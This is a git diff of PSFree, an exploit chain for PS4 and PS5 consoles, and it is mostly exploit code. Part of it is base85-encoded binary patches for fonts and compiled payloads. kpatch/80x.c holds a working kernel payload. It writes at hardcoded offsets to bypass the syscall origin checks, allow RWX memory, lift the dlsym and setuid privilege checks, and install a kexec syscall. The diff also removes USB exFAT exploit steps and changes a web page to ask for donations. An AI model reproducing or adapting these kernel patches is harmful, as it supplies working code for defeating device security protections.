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
T_w~A*y-@+KC(2mM#GU^GAWDHh

literal 0
HcmV?d00001

diff --git a/fonts/README.txt b/fonts/README.txt
new file mode 100644
index 0000000..067f156
--- /dev/null
+++ b/fonts/README.txt
@@ -0,0 +1,3 @@
+git: https://github.com/liberationfonts/liberation-fonts.git
+
+See FONTS.LICENSE for the license.
diff --git a/index.html b/index.html
index c26269f..004cca5 100644
--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-<!-- Copyright (C) 2023 anonymous
+<!-- Copyright (C) 2023-2025 anonymous
 
 This file is part of PSFree.
 
@@ -15,40 +15,27 @@ GNU Affero General Public License for more details.
 You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.
 -->
-<script>
-    //function added By EchoSrech
-    var fwFromUA = parseFloat(navigator.userAgent.substring(navigator.userAgent.indexOf('PlayStation ') + 14, navigator.userAgent.indexOf(') Apple')));
-    
-    if (navigator.userAgent.includes('PlayStation 4')) {
-        if (fwFromUA >= 6.00 && fwFromUA <= 9.60) {
-            alert(`Current PS4 Firmware: ${fwFromUA.toFixed(2)}. Are You Ready?`);
-        } else {
-            alert(`Current PS4 Firmware ${fwFromUA.toFixed(2)} Is Not Supported`);
-            window.stop();
-        }
-    } else if (navigator.userAgent.includes('PlayStation 5')) {
-        if (fwFromUA >= 1.00 && fwFromUA <= 5.50) {
-            alert(`Current PS5 Firmware: ${fwFromUA.toFixed(2)}. Are You Ready?`);
-        } else {
-            alert(`Current PS5 Firmware ${fwFromUA.toFixed(2)} Is Not Supported`);
-            window.stop();
-        }
-    } else {
-        alert(`Current System Is Not Supported`);
-        window.stop();
-    }
-    </script>
-    <html>
-        <head>
-            <meta charset='utf-8'>
-            <title>PSFree 1.4.0 Beta 4</title>
-        </head>
-    
-        <body>
-            PS4/PS5 exploit using CVE-2022-22620<br>
-            PS4 versions vulnerable: 6.xx-9.xx (tested 6.00-9.60)<br>
-            PS5 versions vulnerable: 1.xx-5.xx (tested 1.00-5.50)<br>
-            <a href="./about.html" data-jslicense="1">JavaScript license information</a>
-        </body>
-        <script type='module' src='alert.mjs'></script>
-    </html>
\ No newline at end of file
+<html>
+    <head>
+        <meta charset='utf-8'>
+        <title>exploit</title>
+        <style>
+            @font-face {
+                font-family: 'logging';
+                src: url('fonts/LiberationMono-Regular.ttf');
+            }
+            #console {
+                font-family: 'logging';
+            }
+        </style>
+    </head>
+    <body>
+        PSFree: A PS4/PS5 Exploit Chain<br>
+        Donation (Monero/XMR):<br>
+        86Fk3X9AE94EGKidzRbvyiVgGNYD3qZnuKNq1ZbsomFWXHYm6TtAgz9GNGitPWadkS3Wr9uXoT29U1SfdMtJ7QNKQpW1CVS<br>
+        See <a href='./about.html' data-jslicense='1'>JavaScript license information</a> for the
+        source code and license.<br>
+        <pre id='console'></pre>
+    </body>
+    <script type='module' src='alert.mjs'></script>
+</html>
diff --git a/kernel/80x.txt b/kernel/80x.txt
deleted file mode 100644
index 1ea45fd..0000000
--- a/kernel/80x.txt
+++ /dev/null
@@ -1,23 +0,0 @@
-The kernel exploit for the PS4 8.0x firmware series is based on pOOBs4.
-exfathax_pico.img is from pOOBs4. This is currently a work in progress.
-
-steps:
-* write the exfathax_pico.img file to a USB drive
-    $ dd if=exfathax_pico.img of=/dev/<your USB drive>
-* modify exploit.mjs to run rop/800.mjs:
-    import('./code.mj') -> import('./rop/800.mjs')
-
-loading the exploit:
-* have the browser load index.html
-* wait for the "insert USB" alert dialog to prompt you
-* Wait for this console notification to pop up: "This USB storage device's file
-  system is unsupported".
-* close the "insert USB" alert dialog by clicking "OK"
-* keep closing future alert dialogs
-* once you reach a log saying "kernel exploit succeeded", you're done
-
-exFAT heap overflow bug hackerone report:
-https://hackerone.com/reports/1340942
-
-pOOBs4:
-https://github.com/ChendoChap/pOOBs4
diff --git a/kpatch/80x.c b/kpatch/80x.c
index b00a63c..9f90996 100644
--- a/kpatch/80x.c
+++ b/kpatch/80x.c
@@ -1,4 +1,4 @@
-/* Copyright (C) 2024 anonymous
+/* Copyright (C) 2024-2025 anonymous
 
 This file is part of PSFree.
 
@@ -20,14 +20,38 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 #include "types.h"
 #include "utils.h"
 
-// Args:
-//   res:
-//     Needed value to return (as to not crash) if the caller of the hijacked
-//     function is expecting some valid value.
-//   error:
-//     Address to return an error. 0 for success.
+struct kexec_args {
+    u64 entry;
+    u64 arg1;
+    u64 arg2;
+    u64 arg3;
+    u64 arg4;
+    u64 arg5;
+};
+
+void do_patch(void);
+void restore(struct kexec_args *uap);
+
 __attribute__((section (".text.start")))
-u64 kpatch(u64 res, u64 *error) {
+int kpatch(void *td, struct kexec_args *uap) {
+    do_patch();
+    restore(uap);
+    return 0;
+}
+
+void restore(struct kexec_args *uap) {
+    u8 *pipe = uap->arg1;
+    u8 *pipebuf = uap->arg2;
+    for (size_t i = 0; i < 0x18; i++) {
+        pipe[i] = pipebuf[i];
+    }
+    u64 *pktinfo_field = uap->arg3;
+    *pktinfo_field = 0;
+    u64 *pktinfo_field2 = uap->arg4;
+    *pktinfo_field2 = 0;
+}
+
+void do_patch(void) {
     // offset to fast_syscall()
     const size_t off_fast_syscall = 0x1c0;
     void * const kbase = (void *)rdmsr(0xc0000082) - off_fast_syscall;
@@ -36,30 +60,39 @@ u64 kpatch(u64 res, u64 *error) {
 
     // patch amd64_syscall() to allow calling syscalls everywhere
 
-    //     mov     ecx, 0xffffffff ; at 0x490, patch to "mov ecx, 0"
-    //     mov     rax, qword [r15 + 0x340] ; check if libkernel is loaded
-    //     test    rax, rax
-    //     je      not_loaded
-    //     ; 0x4b5 and 0x4b9 are replaced with NOPs so that we always reach
-    //     ; 0x4c2
-    //     ...
-    //     je target ; at 0x4c2, patch je to jmp
-    // not_loaded:
-    //     test ecx, ecx, ; ecx = 0, always jump to target
-    //     je target
-    //     ...
-    // target:
-    //     test    byte [rbx + 0x469], 2
-    //     jne     ...
+    // struct syscall_args sa; // initialized already
+    // u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
+    // int is_invalid_syscall = 0
     //
-    // Following the target code path, you will at one point reach this:
-    //     lea     rsi, [rbp + 0x78]
+    // // check the calling code if it looks like one of the syscall stubs at a
+    // // libkernel library and check if the syscall number correponds to the
+    // // proper stub
+    // if ((code & 0xff0000000000ffff) != 0x890000000000c0c7
+    //     || sa.code != (u32)(code >> 0x10)
+    // ) {
+    //     // patch this to " = 0" instead
+    //     is_invalid_syscall = -1;
+    // }
+    write32(kbase, 0x390, 0);
+    // these code corresponds to the check that ensures that the caller's
+    // instruction pointer is inside the libkernel library's memory range
+    //
+    // // patch the check to always go to the "goto do_syscall;" line
+    // void *code = td->td_frame->tf_rip;
+    // if (libkernel->start <= code && code < libkernel->end
+    //     && is_invalid_syscall == 0
+    // ) {
+    //     goto do_syscall;
+    // }
+    //
+    // do_syscall:
+    //     ...
+    //     lea     rsi, [rbp - 0x78]
     //     mov     rdi, rbx
-    //     mov     rax, qword [rbp + 0x80]
+    //     mov     rax, qword [rbp - 0x80]
     //     call    qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
     //
     // sy_call() is the function that will execute the requested syscall.
-    write32(kbase, 0x490, 0);
     write16(kbase, 0x4b5, 0x9090);
     write16(kbase, 0x4b9, 0x9090);
     write8(kbase, 0x4c2, 0xeb);
@@ -68,36 +101,44 @@ u64 kpatch(u64 res, u64 *error) {
 
     // patch maximum cpu mem protection: 0x33 -> 0x37
     // the ps4 added custom protections for their gpu memory accesses
-    // GPU R: 0x10, W: 0x20, X:, 0x40
+    // GPU X: 0x8 R: 0x10 W: 0x20
     // that's why you see other bits set
-    write8(kbase, 0xfd03a, 0x37);
-    write8(kbase, 0xfd03d, 0x37);
+    // ref: https://cturt.github.io/ps4-2.html
+    write8(kbase, 0x16632A, 0x37);
+    write8(kbase, 0x16632D, 0x37);
 
     // patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
-    write32(kbase, 0x3ec68d, 0);
+    //
+    // this check is skipped after the patch
+    //
+    // if ((new_prot & current->max_protection) != new_prot) {
+    //     vm_map_unlock(map);
+    //     return (KERN_PROTECTION_FAILURE);
+    // }
+    write32(kbase, 0x00080B8B, 0);
 
     // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
 
     // call    ...
-    // mov     r14, qword [rbp + 0xad0]
+    // mov     r14, qword [rbp - 0xad0]
     // cmp     eax, 0x4000000
-    // jb      ... ; patch je to jmp
-    write8(kbase, 0x31953f, 0xeb);
+    // jb      ... ; patch jb to jmp
+    write8(kbase, 0x23B67F, 0xeb);
     // patch called function to always return 0
     //
-    // sys_dynlib_dlysm:
+    // sys_dynlib_dlsym:
     //     ...
     //     mov     edi, 0x10 ; 16
-    //     call    patched_function ; kernel_base + 0x951c0
+    //     call    patched_function ; kernel_base + 0x221b40
     //     test    eax, eax
     //     je      ...
-    //     mov     rax, qword [rbp + 0xad8]
+    //     mov     rax, qword [rbp - 0xad8]
     //     ...
     // patched_function: ; patch to "xor eax, eax; ret"
     //     push    rbp
     //     mov     rbp, rsp
     //     ...
-    write32(kbase, 0x951c0, 0xC3C03148);
+    write32(kbase, 0x221b40, 0xC3C03148);
 
     // patch sys_setuid() to allow freely changing the effective user ID
 
@@ -105,7 +146,7 @@ u64 kpatch(u64 res, u64 *error) {
     // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
     // test eax, eax
     // je ... ; patch je to jmp
-    write8(kbase, 0x34d696, 0xeb);
+    write8(kbase, 0x1A06, 0xeb);
 
     // overwrite the entry of syscall 11 (unimplemented) in sysent
     //
@@ -116,13 +157,14 @@ u64 kpatch(u64 res, u64 *error) {
     //     u64 rcx;
     //     u64 r8;
     //     u64 r9;
-    // }
+    // };
     //
-    // jumps to uap->rdi
-    // u32 sys_kexec(struct thread td, struct args *uap)
+    // int sys_kexec(struct thread td, struct args *uap) {
+    //     asm("jmp qword ptr [rsi]");
+    // }
 
     // sysent[11]
-    const size_t offset_sysent_11 = 0x10fc6e0;
+    const size_t offset_sysent_11 = 0x1100520;
     // .sy_narg = 6
     write32(kbase, offset_sysent_11, 6);
     // .sy_call = gadgets['jmp qword ptr [rsi]']
@@ -130,15 +172,5 @@ u64 kpatch(u64 res, u64 *error) {
     // .sy_thrcnt = SY_THR_STATIC
     write32(kbase, offset_sysent_11 + 0x2c, 1);
 
-    // restore socketops.fo_chmod
-    // it was used initially to perform kernel code execution
-    write64(kbase, 0x1a76060, kbase + 0x3d0a60);
-
     enable_cr0_wp();
-
-    if (error != NULL) {
-        *error = 0;
-    }
-end:
-    return res;
 }
diff --git a/kpatch/80x.d b/kpatch/80x.d
new file mode 100644
index 0000000..fc6d58d
--- /dev/null
+++ b/kpatch/80x.d
@@ -0,0 +1 @@
+80x.o 80x.d : 80x.c types.h utils.h
diff --git a/kernel/exfathax_pico.img b/kpatch/80x.elf
similarity index 62%
rename from kernel/exfathax_pico.img
rename to kpatch/80x.elf
index a7f9eea86426dcecbba414249890c35ddcea1dba..6b76818f1d0fbc50b84bf604a7c1f627eb2f777d 100644
GIT binary patch
literal 5216
zcmeHLO=uHQ5S~riBt=cuQY09W*jDfdL+r&CMItoq1M6SJDk!XJk`j<o*{%@1l(m<{
zP>6RAJ?hPir3DW$f$X*31wj-Fy;$nWL)V#?_sAM@D0q`MkoV1-`DWj|Z}*Z}PR~sF
zG!3Nr;3~-700vVcu{J0f6dMOWu0aTJZa<~;PM+$>2+QJO5+(2U4=dk?`TS90A|j9Y
z5=VIyKq7I;?qFS@?H*|Lv~?i9A}Ixw0!jg;fKosypcGIFC<T-PN&%&SQs947U@vm=
z_gz-m+rEysW0kMlLBtKZ>BA=FSoOZnR?R4@Y_aOC5Ig%hvaXkhG`3RL*u>9gyR14L
zWeybpx^dz1+Rc{$^~f0e^etYgvw;R%eU;jG-AKI7PP^{D8yT)UcFoUgVcxMn;Gg_j
z4V_KywCo1rPRl-*I|i3p_5}jRt{w{Uik7{+J_0+Aor(<uyI60w?7(s4J9fNZ*Jwt-
z?8cYJVZ7DrGZ=B~8C+=`K@A)M99>`o&GzXqBv5;i0j;EKvBSYo4aqb=IDx-k*!UH}
zp;(gQuIs)Nu_)ps{@x>x_>d0kE56w<^{U1Em)DR>H+_To@91wJenh0_ZXr@hFQb0@
zV7F(!SDaoS;B-dLQTP@YR0am|$`24}&LaCB5pn97;_{B?MI3?0`JHGpo-8GDU>MUk
z?-^-kOl7X!NE>W21NlYcY1YaW!7MCUi)I0yw6~C0dcI&~=MXKkjYa8Mg^~q{LeZEv
zvkQfeXB6`$9ro`Q!$**Y-kA~IQ_i70qc4hbE_cLoO2m9(AHs)GeMro$9*MYw_O~f_
z0Hh<GFYD!dk#n!n4wZZO#s6jAT5qB(&VMU{G=rmBc|LuQWYjBtciom0^SrUH1fAzK
RI;L0soT#7hlF{$3{{y-lyJ-Lb

literal 6144
zcmeH{=T3q#6owxJ5fJy@ihJ+9Z~^X#d)<dC@p8OLJtau|;V)xi^7)?R?Ky4Jrsru-
z;dd;W-Nt9$DbEzidUF{IXJ$To@_$bt{r2??0qf+Of~Epf$P_lYdn`1`yhq^mo0R-+
ztkgB{u910~fY1JFKLM-!pjCayDn4S>9;Jw4O6(bwQBDPwR8dV0wbW5h1C2D%Obe~F
z5u=?BI_aXD9(w7cp8*CLVwe#|8DpFYCYfTI8D^Pdo&^?JVwpHAtg^;B8ze}QVv{Yl
z*<qJG_Br5?BaS&C%_(P`bHOE7Tyw)McijJI{R59Y@yv^-Z&t~PfCz|y2#A0Ph=2%)
UfCz|y2#7$AKs*;I_=f~O0BS=Ywg3PC

diff --git a/kpatch/80x.o b/kpatch/80x.o
new file mode 100644
index 0000000000000000000000000000000000000000..06b1b926796270c2cc74e1e8adf7808f7486c4b3
GIT binary patch
literal 1832
zcmbVM&1(};5TA|xNNJlyDH5#cS}C?-mm~!IKqXS!yhBk?S`QxDZMwBm^TB2VsRzs2
zi!l`9%|D_30haa_8^~VuE(n59=%uAMk*+hF_mb_hrw+WGncsZwyxCo!nwbtr5(tvu
zA#^l>0&Jb@$SFrmK?nxnIDF+VtG<Y^O+Csg-&yr(kd6NcZ$~~1No=DovAc(*BUVjE
zndL;GD08tvvAgd9>fr?Y_FJyhS>GPp{Fpki?XX;Dqqcowhezs`S>wf*E%R#^K&^(t
zt|K(fJ>&;X^JeBE+-{l^#4NMgA9SiU&Gqf;aA29K;Spf*dZTIfTta`#l)EER5Be~3
z@8?1YSmo0gB9=LWPkMi9U=VN=*nrdMb5=Rtr=+a%%i%kuylg;va`K)$HoI8L86`O$
zSCUF>B3^RT_`5_xi6zH5Oaa&}MDTRuNk5r|0KPt9V!T5r6G?BMfmDu2!vnp+8a6~R
zmmLehea;Dsarq19<n!1i!&E4;5ts|L=D`g<jNZ8mj%*(j_U5+{)H8K{ntD;a;PMx}
zhB+>D(QnkjJ9(&ohwjA6N(OYTXykPbmh$rj)yS;CYKuW1ccVy}<v+Vc=Uq721TJ$N
z=S?$jQ<6&p7yU68F7C#Gl;T>}P!~Zd8hVSb2+7dO1}ICap@OnlEP|qIZ&Za)bXIk=
zW%AjqmO~+zH#7zBe*z7eRj$9vm6U>>FKD{4#)Gw$`DI<rYVCf{Dhy*F-6HM0n^Ii)
z;|5Xo-uN|+otgz=qh3dz#|z&;oObZ6@o|i$oZkLL{r29V50SV2EyQRaQh407!<RvP
zNBw9dKk>cLeiA*vLpg;XVMLF3A<FM2QD5+BGz!`6m-PdEeCH6OZ_B;Al&8SsWl~%u
z`WH|R1#<Pq)4zpi!FhHb-uTyO@|)j2Psn&E&5yoK5ijQFSDQi(dHpR?kOuJh&7X35
fcZd8x^ZHjwaS>13M(Drb7a!wbx$W5!yz&15wphWW

literal 0
HcmV?d00001

diff --git a/kpatch/Makefile b/kpatch/Makefile
index 72c4eda..c6cb539 100644
--- a/kpatch/Makefile
+++ b/kpatch/Makefile
@@ -1,15 +1,15 @@
 TARGET = 80x
 ENTRY = 0x900000000
+src = $(TARGET).c
 
 CC = gcc
+CFLAGS = -O -Wno-int-conversion -fno-strict-aliasing -masm=intel -nostartfiles
+CFLAGS += -fwrapv -no-pie -Ttext=$(ENTRY) -Tscript.ld -Wl,--build-id=none
+CFLAGS += -fwrapv-pointer -std=gnu11
 
 .PHONY: all
 all: $(TARGET).elf
 
-CFLAGS = -O -Wno-int-conversion -fno-strict-aliasing -masm=intel -nostartfiles
-CFLAGS += -fwrapv -no-pie -Ttext=$(ENTRY) -Tscript.ld -Wl,--build-id=none
-CFLAGS += -fwrapv-pointer
-
 $(TARGET).elf: $(TARGET).o
 	$(CC) $(TARGET).o -o $(TARGET).elf $(CFLAGS)
 
@@ -24,6 +24,4 @@ clean:
 	sed 's,\($*\)\.o[ :]*,\1.o $@ : ,g' < $@.$$$$ > $@; \
 	rm -f $@.$$$$;
 
-src = $(TARGET).c
-
 include $(src:.c=.d)
diff --git a/kpatch/utils.h b/kpatch/utils.h
index 7cb303e..0c06168 100644
--- a/kpatch/utils.h
+++ b/kpatch/utils.h
@@ -24,7 +24,7 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 inline u64 rdmsr(u32 msr) {
     u32 low, high;
 
-    __asm __volatile("rdmsr" : "=a" (low), "=d" (high) : "c" (msr));
+    asm("rdmsr" : "=a" (low), "=d" (high) : "c" (msr));
     return (low | ((u64)high << 32));
 }
 
diff --git a/module/chain.mjs b/module/chain.mjs
index 794371a..c77e399 100644
--- a/module/chain.mjs
+++ b/module/chain.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2023 anonymous
+/* Copyright (C) 2023-2025 anonymous
 
 This file is part of PSFree.
 
@@ -15,46 +15,82 @@ GNU Affero General Public License for more details.
 You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 
-import { Int } from './int64.mjs';
+import { Int, lohi_from_one } from './int64.mjs';
 import { get_view_vector } from './memtools.mjs';
-import { Addr, mem } from './mem.mjs';
+import { Addr } from './mem.mjs';
 
-import {
-    read64,
-    write64,
-} from './rw.mjs';
-
-import * as o from './offset.mjs';
+import * as config from '/config.mjs';
 
 // put the sycall names that you want to use here
 export const syscall_map = new Map(Object.entries({
-    'close': 6,
+    'read' : 3,
+    'write' : 4,
+    'open' : 5,
+    'close' : 6,
+    'getpid' : 20,
     'setuid' : 23,
     'getuid' : 24,
-    'mprotect': 74,
+    'accept' : 30,
+    'pipe' : 42,
+    'ioctl' : 54,
+    'munmap' : 73,
+    'mprotect' : 74,
+    'fcntl' : 92,
     'socket' : 97,
+    'connect' : 98,
+    'bind' : 104,
+    'setsockopt' : 105,
+    'listen' : 106,
+    'getsockopt' : 118,
     'fchmod' : 124,
+    'socketpair' : 135,
+    'fstat' : 189,
